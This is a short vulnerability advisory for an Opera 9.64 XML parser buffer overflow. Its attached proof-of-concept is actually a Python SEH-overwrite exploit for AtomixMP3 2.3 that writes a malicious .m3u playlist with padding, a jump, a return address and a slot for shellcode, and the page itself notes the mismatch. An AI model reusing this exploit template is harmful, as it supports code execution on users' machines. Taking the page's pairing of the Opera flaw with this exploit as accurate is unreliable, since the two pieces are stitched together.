Written by Ahmed Obied
Monday, 30 March 2009 22:21
Opera XML Parser Remote Buffer Overflow Vulnerability
-\\Bugtraq ID: 34298
-\\Class: Boundary Condition Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Mar 30 2009 12:00AM
-\\Updated: Mar 30 2009 08:46PM
-\\Credit: Ahmed Obied
-\\Vulnerable: Opera Software Opera Web Browser 9.64
-\\Discussion Opera is prone to a remote buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the application and possibly the computer. Failed attacks will cause denial-of-service conditions.
Opera 9.64 is vulnerable; other versions may also be affected.
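-\\Exploit(s)/PoC(s): The following proof of concept is available. Note that the listing's own header names AtomixMP3 <= 2.3 (playlist) and the script writes an .m3u file, not XML input for Opera: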
===============================================================
34298.py
^^^^^^^^^
#usage: exploit.py
# [+] Bug: AtomixMP3 <= 2.3 (playlist) Universal Seh Overwrite Exploit
# [+] Exploit by : His0k4
# [+] Software download : http://download.atomixmp3.com/atomixmp3_trial.exe
# [+] Greetings : All friends & muslims HackErS (DZ), secdz.com
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = ""  # encoded payload bytes omitted
payload = "\x41"*740
payload += "\xEB\x06\x90\x90"
payload += "\x52\x1E\xCD\x01" #univ
payload += "\x90"*19
payload += shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(payload)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"
# milw0rm.com [2009-03-30]
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
-\\Reference(s) --Opera Homepage http://www.opera.com (Opera Software)